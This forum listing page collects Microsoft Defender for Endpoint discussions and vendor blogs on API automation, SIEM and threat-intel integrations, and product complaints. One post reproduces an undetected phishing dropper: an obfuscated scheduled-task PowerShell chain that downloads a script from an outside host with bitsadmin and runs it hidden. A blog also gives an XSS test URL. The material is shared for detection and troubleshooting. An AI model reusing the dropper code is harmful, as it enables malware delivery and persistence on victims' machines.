Recent Discussions
Automate response with Defender ATP and Microsoft Flow
Another cool product of the MVP Summit Hackathon by Stefan Schörling. Step by step blog will guide you in how to automate responses with MDATP Flow connector. don't forget to show your love. Use the like button here and share your feedback in this conversation. http://blog.sec-labs.com/2019/04/automate-response-with-defender-atp-and-microsoft-flow/YARA rule support
Hi everybody, I'm curious if Microsoft is planniung to support YARA rules. I think that this will become even more important in the future. I fould this verry old thread from 2019, where this question was asked from other folks: IS MS looking to support custom YARA rules for Windows Defender ATP - Microsoft Tech Community Unfortunately, it looks like that nothing happend so far. Best regards Stefan
[MDE] Add the important feature, Yara rules if possible
Hi, Refer to this advisory (first link). In addition, you can see that there are Yara rules from GitHub (inside pdf). (2nd link) All EDR/XDR companies (except Microsoft) already have features and a Yara rule configuration for the incident responders to detect. The method of adding and detecting Yara rules has been in practice across companies for many years. Would you mind advising on any reason why not adding the important feature, Yara rules? It would be good if you include the important feature, Yara rules. If not, would you mind advising on converting from Yara rules to MDE query for querying via advanced threat hunting? Thanks much appreciated. 🙂 https://www.csa.gov.sg/singcert/Advisories/ad-2021-007 This link is the Yara rule. https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/yara-rule-support/m-p/2276820Automate Windows Defender ATP response action: Machine isolation
5 Minutes Low complexity Response teams rely on powerful actions that allow them take immediate action when a threat is identified. Being able to automate those response actions is a powerful way to enhance a SecOps team’s workflow. In this blog, we’re going to demonstrate how you can automate the machine isolation response action. In our previous blogs we’ve demonstrated how you can: Setup an app and create a script to get WDATP’s alerts (Hello World blog) This is a good reference for when you need to create a new app. Grant more permission, get and update alerts as part of a ticketing/SIEM/SOAR integration (Ticketing System Integration blog) This is a good source of information to learn how to add more permissions on apps. For response teams, a typical use case involves the ability to enrich SIEM or SOAR playbooks with Windows Defender ATP’s powerful remediation capabilities. Just imagine how powerful it can be to detect a malicious activity using your firewall or IPS and isolate the suspicious machine wherever it is (even if the machine is off network at time of response). In this blog, we’ll walk you through using the machine isolation API. This response action will leave the machine disconnected from any network connection other than the Windows Defender ATP channel (allowing Windows Defender ATP to undo). What’s great about this demonstration is that it can be applied with the other response actions documented here. Let’s start In this section, we’ll walk you through the following: Step 1: Add the required permission to your application Step 2: Isolate a machine by machine ID or machine name Step 1 - Add the required permission to the application: If you haven’t created an app: Create an app using the instructions described in the Hello world blog. Then follow the instructions on how to Add Isolation Permission as described below If you’ve already created an app that you’re going to reuse for this demonstration: Add the “Isolate Machine” permission as described below We recommend that you follow the detailed steps as described in the “Step 1 - Add the required permission to the application” in the Alert Update API blog Add Isolation Permission Open Azure portal Navigate to Azure Active Directory > App registrations Under All Apps, find and select the application, for example ContosoSIEMConnector Navigate to Settings > Required permissions > Enable Access Select the checkbox for Isolate machine application permission. Click Save and Grant Permissions. Done! You have successfully added the required permissions to the application. Step 2 – Isolate a machine by machine ID or machine name: Save the following script file as IsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved). IsolateMachine.ps1 param ( [Parameter(Mandatory=$true)][string]$comment, #any comment that help [Parameter(Mandatory=$true)][string]$machineIdOrComputerDnsName, #the machineID or ComputerDnsName [Parameter(Mandatory=$true)] [ValidateSet('Full','Selective')] #validate that the input contains valid isolation type [string]$isolationType #the type of machine isolation ) $token = ./Get-Token.ps1 #Execute Get-Token.ps1 script to get the authorization token $url = "https://api.securitycenter.windows.com/api/machines/$machineIdOrComputerDnsName/Isolate" $body = @{ "Comment" = $comment “IsolationType” = $isolationType } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop if($response.StatusCode -eq 201) #check the response status code { return $true #update ended successfully } else { return $false #update failed } Example 1: Isolate by machine DNS name Find the machine FQDN in the machine page (concatenate the machine name and the domain) For example, to isolate the machine testMachine.contoso.com use the following command: .\IsolateMachine.ps1 -machineIdOrComputerDnsName testMachine.contoso.com -comment “isolate because of alert” -isolationType Full Example 2: Isolate by using machine ID Find the machine ID in the URL of the machine page For example, to isolate machine where machine page URL is https://securitycenter.windows.com/_machine/1f2258dc516c7bf8ec62466e2e876774c0a984f3 use the following command: .\IsolateMachine.ps1 -machineIdOrComputerDnsName 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment “isolate because of alert” -isolationType Full Example 3: Isolate machines with severe alerts Read high severity alerts as described in the previous blogs Use the machine ID found in the alert to isolate the machine using the following script GetSevereAlertsAndIsolate.ps1 # Returns Alerts created in the past 1 hour. and Isolate machines with high severity alerts $token = .\get-token.ps1 $dateTime = (Get-Date).ToUniversalTime().AddHours(-1).ToString("o") #create url with filter for date and severity $url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime and severity eq 'High'" $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-RestMethod -Method Get -Uri $url -Headers $headers -ErrorAction Stop #foreach alert, get the machineId and alertId and isloate machine while writing the alert ID in the isolation comments. foreach ($alert in $response.value){ $machineId = $alert.machineId $alertId = $alert.id $url = "https://api.securitycenter.windows.com/api/machines/$machineId/Isolate" $body = @{ Comment = "Isolate machine because alert - $alertId" } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop #check the isolatino request code and write to log file. if($response.StatusCode -eq 201) { Add-Content c:\temp\api\log.txt "The isolation of machine $machineId ended successfully" } else { Add-Content c:\temp\api\log.txt "Failed to isolate machine $machineId" } } Example 4: Release machine (un-isolate) Save the script below as UnIsolateMachine.ps1 file to the same folder where you save the Hello World example (where Get-Token.ps1 was saved). UnisolateMachine.ps1 param ( [Parameter(Mandatory=$true)][string]$comment, [Parameter(Mandatory=$true)][string]$machineId ) $token = ./Get-Token.ps1 $url = "https://api.securitycenter.windows.com/api/machines/$machineId/UnIsolate" $body = @{ Comment = $comment } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop return ($response.Content | ConvertFrom-Json) Use the following script in the same way to release the machine from isolation .\UnIsolateMachine.ps1 -machineId 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment “un-isolate – machine was found clean” Conclusion: In this blog we demonstrated how you can easily automate Windows Defender ATP response actions. There are more actions you can automate such as run an antivirus scan and restrict app execution. For more information, see more the other actions here . Let us know if you are interested in more specific remediation examples. In the next blog we’ll demonstrate the integration of alerts from other detection sources. Thanks! @Haim Goldshtein, security software engineer, Windows Defender ATP @Dan Michelson, program manager, Windows Defender ATP
False positive: Suspicious PowEmotet behavior was blocked
Based on social media posts, it seems quite a few of us are experiencing numerous false positive alerts related to 'PowEmotet'. While it's understandable that false positives happen it's also somewhat amazing this one made it through QA. But this also highlights some things that I find extremely frustrating about Defender for Endpoint. There does not seem to be a reliable way to deal with these at a tenant level, aside from setting status to "false positive" and potentially adding a file hash of a related executable to Indicators and hoping it goes away. Is there anything I'm missing here? Also, where is Microsoft acknowledging this issue? Where should I go for up to the minute updates on occurrences like this?
Malware not detected (but it should)
Some days ago a colleague has received an email (O365 ATP protected) and clicked the link inside. The link caused a zip file to be downloaded the zip contained2 files, a shortcut and a xml file the shortcut actually created a scheduled task: %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'" so a cmd was started and then a powershell command to parse the content of the zip file the zip file contained the string below (to install the malware) Now the malware is correctly detected but a week ago it wasn't; the reason of concern is that Defender ATP SHOULD have detected a suspicious activity a zip was downloaded the lnk file when double-clicked created a task the task has launched a cmd, the cmd has launched a powershell and the powershell has gone through the file system to get the original zip and install the malware I'm wondering why no suspicious activity was detected. I also wonder why there is no a way to interact with MSFT support in such a case if you don't have a support plan; evidence is that i'm facing a product issue The string contained at the end of the zip file: $IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable'; $1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6); $2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}}; New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "'; start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;Palo Alto Networks and WDATP ad-hoc integration
Integrate your Palo Alto Networks firewall alerts directly into WDATP machine timeline and alert queue 5 Minutes Low complexity Firewall and IPS/IDS are common tools in every organization’s security toolbox. While those tools can proficiently detect suspicious connections to command and control servers (C2 server) from a client machine, actionable alerts that pinpoint the process which created the connection are not surfaced for security teams to investigate and respond to. In this blog we’ll demonstrate how to integrate Palo Alto Networks Next-Gen Firewall alerts with Windows Defender ATP to leverage the power of their detections to identify actionable alerts. Palo Alto Networks Next-Gen Firewall has an API which allows Palo Alto’s customers to get alerts from the alerts log of both the firewall and WildFire sandbox. You can choose to use the API to get information from a specific firewall appliance or use the same API with Palo Alto Networks Panorama which allows you to get the alerts from all of your Palo Alto Networks Next-Gen Firewall and WildFire appliances. You can get the full documentation of the Palo Alto Networks API here. Let’s start It is only 3 simple steps that will get you the desired integration: Step 1: Settings in Palo Alto Networks Next-Gen Firewall. Read-only API role creation User creation and role assignment Update the sample script Step 2: Windows Defender ATP settings: Add API permissions. Step 3: Test runs WildFire alert Firewall alert Step 1 - Settings in Palo Alto Networks Next-Gen Firewall: To get the alerts from Palo Alto Networks Next-Gen Firewall we first need to create a user on the firewall with the required permissions: Open the Palo Alto Networks Next-Gen Firewall administration console. Login as a privileged user. Go to Device > Admin Role > Add. Give a name to the role and remove all the permissions on all tabs except from “Log” permission under XML-API tab then click OK. Go to Device > Administrators > Add. Enter a name and a password, choose “Role Based” in the administrator type settings and in the profile’s field chose the role we created. Important!!! Click Commit on the right upper corner. Done! you have successfully added a user with the required permissions. Note: since many organizations leave the firewall with the default self-signed certificate, I’ve added a bypass in the script (published by PoshKazun on Github). If your firewall is set with a trusted certificate you can change the “trustSelfSignCertificate” parameter to false. Download the Powershell script attached to this blog and save it in the same folder you save the Get-Token.ps1 script from the Hello world blog and modify the “#### required information from step 1 #####” section A typical section may look like: $firewallURL = "https://TheUrlToYourFireallMgmtConsole" $username = "theNewUserWeCreated" $password = "NewUserPassword" $alertQueryTimeframe = 30 $minimumAlertSeverity = "medium" Done! you successfully complete the required steps to use Palo Alto Networks API Step 2: Settings in Windows Defender ATP In this step, we will add the required permissions to Windows Defender ATP. we will add the permission to the application we set in the Hello World blog. If you didn’t setup an application yet, you need to follow the hello world 3 short steps to create one. First, we need to add the permission “Run advance queries” and “Read and write all alerts” Open the Azure portal. Navigate to Azure Active Directory > App registrations. Under All Apps, find and select the application, for example, ContosoSIEMConnector. Navigate to Settings > Required permissions > Enable Access. Select the checkbox for “Run advance queries” and “Read and write alert” application permission. Click Save and Grant Permissions. Done! you successfully added the required permission to windows Defender ATP. Step 3: Test runs WildFire Alert Download Palo Alto Networks Wildfire test file and create an alert in WDATP Portal. Open your browser and navigate to https://wildfire.paloaltonetworks.com/publicapi/test/pe Wait 5-10 minutes and run the powershell script. Firewall Alert Create a fake suspicious network connection and create an alert in WDATP Portal. Open your browser and navigate to https://testing.com/book.html?default=<script>alert(XSS test)</script> Wait 5 minutes and run the powershell script. Note: if your firewall policy action for vulnerabilities set to “Reset-both”, then the firewall will reset the connection before it starts. In that case, you will not find a network connection telemetry in WDATP portal. Now open WDATP portal and look for the alerts. You should find Palo Alto Network firewall alert and Palo Alto Networks Wildfire alerts in WDATP alert queue. And in machine timeline: Recommendations: We recommend scheduling the integration script to run every 20 minutes with alertQueryTimeframe set to 30 minutes to allow overlap. Conclusion: While network protection solutions catch the threats in the network bottleneck, they still miss the context and the ability to remediate the endpoint. The combination of Palo Alto Networks firewall and WDATP creates a unique better-together value from detection to remediation. In future blogs we'll show you how to force AutoIR to automatically remediate the root of the threat. You can follow these steps to create Windows Defender ATP's alerts from other security/SOAR/SIEM solutions. Let us know if you are interested to integrate alerts from other sources. Thanks! @Haim Goldshtein, security software engineer, Windows Defender ATP @Dan Michelson, program manager, Windows Defender ATP @Ben Alfasi, software engineer, Windows Defender ATP
Microsoft Defender API - Live Response Session Logging
Hello, are there any plans to expose the Live Response session data via the API? The data I'd be particularly interested in would be: Command logs, who created the session, when the session started, and the duration of the session. We currently track incident investigation in a third party tool, if an analyst was required to open a Live Response session as part of remediation efforts, we'd ideally like to pull all resulting command logs into that ticket. This would also be great for longer term reporting and auditing purposes, e.g. pulling ALL Live Response session data into a log aggregation platform like ELK/QRadar/Splunk etc. I think it would be a great addition to the other machine actions that are exposed here: https://docs.microsoft.com/en-gb/windows/security/threat-protection/microsoft-defender-atp/machineaction Property: type Description: Type of the action. Possible values are: "RunAntiVirusScan", "Offboard", "CollectInvestigationPackage", "Isolate", "Unisolate", "StopAndQuarantineFile", "RestrictCodeExecution" and "UnrestrictCodeExecution"Microsoft Defender ATP and Malware Information Sharing Platform integration
Pull file hashes (SHA1) from Malware Information Sharing Platform (MISP) and push them to Microsoft Defender ATP 5 Minutes Low complexity Enterprises use threat intelligence to enrich their cyber security telemetry as well as to detect and block attacks. Microsoft Defender ATP supports blocking capabilities through the portal using the indicators page and the indicators API. In a previous blog, we explained how to generally use the indicators API. In our commitment to listen to customer feedback, we’re going to demonstrate how to leverage the power of Malware Information Sharing Platform (MISP) to further augment the protection offering of Microsoft Defender ATP. MISP is a free and open source threat sharing platform. It is designed to help share threat intelligence information such as cyber security indicators, vulnerability information, and others. In this blog, we will demonstrate an easy way to automatically pull the indicators from the MISP platform and push them into the custom IoC list of Microsoft Defender ATP. We’ll guide you on how to pull SHA1 hashes from the past four days from MISP, and push them as indicators for Microsoft Defender ATP to detect. We’ll push the indicators with an expiration date set to seven days from the time the script is run to ensure the freshness of indicators. Let’s start Add the required permission to write indicators to Microsoft Defender ATP Get your MISP URL and Authorization key Download and use the script to use MISP API to pull SHA1* hashes from your MISP platform and push them into Microsoft Defender ATP Step 1: Add permission to write indicators to Microsoft Defender ATP NOTE: This step is identical to the process detailed in our previous blog. If you’ve already done it, skip this step. If you haven’t created an app: Create an app using the instructions described in the Hello world Then follow the instructions on how to Add Isolation Permission as described below. If you’ve already created an app that you’re going to reuse for this demonstration: Add the “TI.ReadWrite.All” permission as described below. We recommend that you follow the detailed steps as described in the “Step 1 - Add the required permission to the application” in the Alert Update API blog. Add TI write permissions Open Azure portal. Navigate to Azure Active Directory > App registrations. Under All Applications, find and select the application, for example, ContosoSIEMConnector. Click API permissions > Add a permission. Click on “APIs my organization uses” and type WindowDefenderATP in the search box. Then chose the “WindowsDefenderATP” API from the list. Click on “Application permission” button and check the “TI.ReadWrite.All” checkbox. Click Add Permission. On the “API Permission” screen, click on “Grant admin consent for…” button. Done! You have successfully added the required permissions to the application. Step 2: Get your MISP URL and Authorization key To use MISP API, you will your MISP URL and authorization key. You can get the URL from MISP web interface and the API key from the Automation section of the MISP web interface. See below: Step 3: Run the script Download the zip file at the bottom of this blog and extract the “Get-MISP-Hash.ps1” script. Make sure the script in the same directory (folder) as your “Get-Token.ps1” script. Now lets run the script! Let’s say your MISP URL is 10.0.0.1 and the key is Yn81mP1ck13Ric4. Open PowerShell and run the following command: .\Get-Misp-Hash.ps1 -title “Sha1 from MISP” -mispUrl “10.0.0.1” -authKey “Yn81mP1ck13Ric4” And that’s it, you are done! You can see the new hashes on your Microsoft Defender Security Portal by clicking on Settings, then look for “Indicators” on the menu on the left of the screen. The script also offers additional (optional) fields you may want to use to control the indicators and how the MDATP handles them: Parameter Description Default value -title The alert’s title - -mispUrl Your MISP URL from the MISP platform - -authKey Your MISP authorization key - -action (optional) Choose one: Alert/AlertAndBlock/Allowed Alert -severity (optional) Choose one: Informational/Low/Medium/High Informational -description (optional) the alert’s description - -recommendedAction (optional) the recommended action to remediate the alert - -expiration (optional) number of days the hashes will expire and deleted from the MDATP 7 Another example that utilizes all of the options is shown below all in the same line: .\Get-MISP-Hash.ps1 -title "Sha1 from MISP" -mispUrl “10.0.0.1 ” -authKey “Yn81mP1ck13Ric4” -action AlertAndBlock -severity High -description "Sha1 from the MISP platform loaded by automated script" -recommendedActions "Add your own recommended actions" -expiration 14 Conclusion In this blog, we demonstrated how you can pull SHA1 hashes from MISP to augment the Microsoft Defender ATP protection capabilities FAQs: Which file hashes are supported? This integration supports SHA1. MISP’s API only supports SHA1 and MD5 (which is relatively weak), while Microsoft Defender ATP supports SHA1 and SHA256. Also note that “Only published events and attributes marked as IDS Signature are exported” (MISP API documentation). How do I modify the MISP filter? The MISP API we used to get the hashes has some filtering options. We set the script to get hashes from the past 4 days: https://<your_MISP_URL>/events/hids/sha1/download/false/false/false/4d You can change it to any other number of days or hours, also you can filter by start and end date or by MISP tags you’ve set up. For the full details, see MISP’s API DOC here: https://www.circl.lu/doc/misp/automation/ and look for the “GET /events/hids Hash” section. Important note: If the hash you are submitting already exists in Microsoft Defender ATP with a different expiration date or severity etc., it’s OK – it will be updated with the new value. However, if it already exists with a different “action” field value (Alert, AlertAndBlock or Allow), it will not be updated (or submitted), and the script will print the hash with the corresponding message – this is by design. Please share your thoughts and feedback here. Thanks, @Itai Zur, program manager, Windows Defender ATP @Thorsten Henking, senior program manager @Dan Michelson, program manager, Windows Defender ATP @Haim Goldshtein, security software engineer, Windows Defender ATPMDATP & Cloud App Security Integration
Native support for the discovery of Shadow IT One-click integration of Microsoft Cloud App Security with MDATP Overview At RSA, RSA is the world’s largest cybersecurity conference, we announced the general availability for Microsoft Defender ATP’s integration with Microsoft Cloud App Security – delivering a native integration to discover the cloud apps used in your organization. This is the first step towards enabling a seamless, zero deployment, native cloud app security solution that works any time any-where. Read below to learn why we do it, how to enable it with a single click, what the new value and experience are and how we’re going to continue to enhance these capabilities in the future. Even if you are already using Microsoft Cloud App Security to monitor Shadow IT, the new integration provides additional value to the Discovery data. Key Benefits The short answer is “you get more for less”. 4 main advantages: Agent-less cloud app discovery Discovery beyond the corporate network Machine-based investigation Single-click enablement As a native OS component, we strive to continuously add value for customers via the Supported operating systems Windows 10 1903 or later; 1809 (KB 4482887); 1803 (KB 4489894); 1709 (KB 4489890) Enabling the new integration If you have Microsoft Cloud App Security up and running in the same tenant as MDATP it’s down to a single click: Go to the Advanced Settings in the Windows Defender Security Center and enable the Microsoft Cloud App Security integration And you’re done. Microsoft Defender ATP will start sending the relevant log data to Microsoft Cloud App Security. If you’re not using Microsoft Cloud App Security yet, start a trial to test this integration. Image 1: 1-click enablement Note! After enabling the integration, it takes some time for the data collection to kick off and for data transit and processing to start. It will take few minutes for the connected endpoints to start collecting and sending the desired telemetry and then up to 4 hours to process the first batches and build the report. Deep insights into your organization’s cloud app usage Once you’ve enabled the integration, navigate to the Cloud Discovery dashboard from the navigation pane in the Microsoft Cloud App Security portal. Once you select the Win10 endpoint users report from the list of continuous reports, a new “Machines” tab is added to the dashboard. Image 2: Cloud Discovery – Discovered apps view Typical use cases Discovery With the Discovery capabilities in Microsoft Cloud App Security you get new insights into the existing cloud use in your organization and tools to evaluate risks and start governing existing Shadow IT. Image 1 depicts the typical lifecycle of managing the discovered apps in your organization. Image 3: Shadow IT management lifecycle The new machine view By integrating with Microsoft Defender ATP, an additional Machines tab is added to dashboard. This provides all the information on a machine-basis, rather than on a user-basis. This allows you to analyze the findings on a machine basis to get granular insights into the apps accessed from specific machines. In addition, all the data now also includes information of cloud apps that were accessed outside of the corporate network. Image 4: Machine-based investigation in MCAS portal Continue your investigation in Microsoft Defender ATP If you find anything suspicious, such as a user having uploaded unusually high amounts of data to a risky app, you may want to continue your investigation in Microsoft Defender ATP and ensure that the machine is not compromised. A single click (on the up-right Microsoft Defender ATP link) will shift to the verbose machine page of MDATP. There, in the machine timeline, you can investigate the root cause down to the process level and if needed even to the ancestor processes, download origins etc. What’s next This native integration is another step towards creating a set of comprehensive, natively integrated security solutions across Microsoft 365. Building this endpoint-based CASB scenario to play together in a seamless experience is a strategic decision to simplify your security and compliance processes. Based on your feedback during our public preview, we back ported this capability set to Windows 10 1709 to make it more broadly applicable. Update your clients to have it. The updated clients will then also be able to feed telemetry to Microsoft Cloud App Security. In addition, we will continue to enhance the existing integration with additional capabilities: Seamless enforcement of Microsoft Cloud App Security policies, such as the blocking of unsanctioned cloud apps Enforcement statistics of policies sent from Microsoft Cloud App Security to the Microsoft Defender ATP agent Support for non-Windows endpoints More resources and feedback Get started with a Microsoft Cloud App Security trial today Check out this e-book to learn more about the integration between Microsoft Defender ATP and Microsoft Cloud App Security Learn more about Microsoft Cloud App Security. Technical documentation to get started. Microsoft Cloud App Security licensing information. As always, we’d love to hear your feedback. Please share your thoughts and feature suggestions! Microsoft Defender ATP & Microsoft Cloud App Security Teams
Defender GitHub documentation now in private repos
Forced to pick a category, so it's in Endpoint since that's one of the biggest areas affected: I've noticed that all Defender documentation within Microsoft-Docs public repositories has now been stripped and moved to "defender-docs-pr" - a private repository on GitHub. Anyone have any insight on the rationale behind this? Seems like a step backwards by hiding it all away. More recent commit history showing all the removal of content from public docs repo - https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security New private docs repo (this will 404 for most people) - https://github.com/MicrosoftDocs/defender-docs-pr Very disappointing change, as this will have walled away what was previously seen as a very collaborative platform for directly suggesting updates / fixes to documentation. I realise this may be in line with moving of feedback channels away from GitHub, but to now also lose visibility, rationale, history of the updates themselves from public view is a huge boon.
Web content filtering and indicator aren't working on third party browser
Hi, we have just noticed that web content filtering and customized indicators are not working on third party browsers after upgraded defender for endpoint to 4.18.23050.3, the issue has happened to both Win10 and Win11 machines. Has anyone else got the same issue?Defender for Endpoint Server standalone license
As of September 1, Microsoft has removed the Defender for Endpoint on Servers P1 and P2 licenses, forcing on-premises customers to use Azure ARC / Defender for Cloud! Onboarding to Azure ARC is not always possible, another agent is required and it requires a huge effort for the management of the subscription, security and assets. Microsoft will lose EDR customers... This will also show up in the client licenses of Defender for Endpoint. If Microsoft does not want on-premises server customers in their EDR solutions, the customers will not go with two EDR solutions but leave Microsoft and choose antoher EDR / XDR solution for server AND clients. How does Microsoft imagine it if different MSPs provide services for the customer and on premises and Azure are strictly separated? Should the Azure partner then have access to the on-premises systems. That won't happen. Another bad decision for customers, partners and lastly for Microsoft. Please revert your decision and make the Defender for Endpoint Server P2 License available again through CSP, EA and Direct.MsSenseS.exe high CPU usage
Good Afternoon - We have a few servers in Azure that have extremely high CPU usage due to the "MsSenseS.exe" process. Is there anything that can be done to alleviate this? Seems like this process is related to Defender or some sort of Microsoft sensor. I have opened a ticket with Microsoft Support which has not been that helpful.
Advanced Hunting for SmartScreen events
Recently I've been working on some Advanced Hunting queries for Web Content Filtering. This data is easy to find for third party browsers such as Chrome or Firefox assuming Network Protection is turned on. Simply query DeviceEvents | Where ActionType == 'ExploitGuardNetworkProtectionBlocked'. However, Edge does not use Network Protection to block sites based on Web Content Filtering. It utilizes SmartScreen. As such I would expect that these events would be under the 'SmartScreenUrlWarning' ActionType. However, this doesn't return any data. In fact, I've found that none of the SmartScreen related ActionTypes return any data. I've confirmed that SmartScreen is enabled and functional with the tools on demo.wd.com. Has anyone been able to successfully query SmartScreen data through Advanced Hunting?
Recent Blogs
- As of today, October 14, 2025, Microsoft is officially ending support for Windows 10. This means that Windows 10 devices will no longer receive security or feature updates, nor technical support from...Oct 14, 2025
- We’re excited to announce a key milestone in Defender’s multi-tenant management journey—Microsoft Defender for Endpoint security policies can now be distributed across multiple tenants from the Defen...Aug 07, 2025
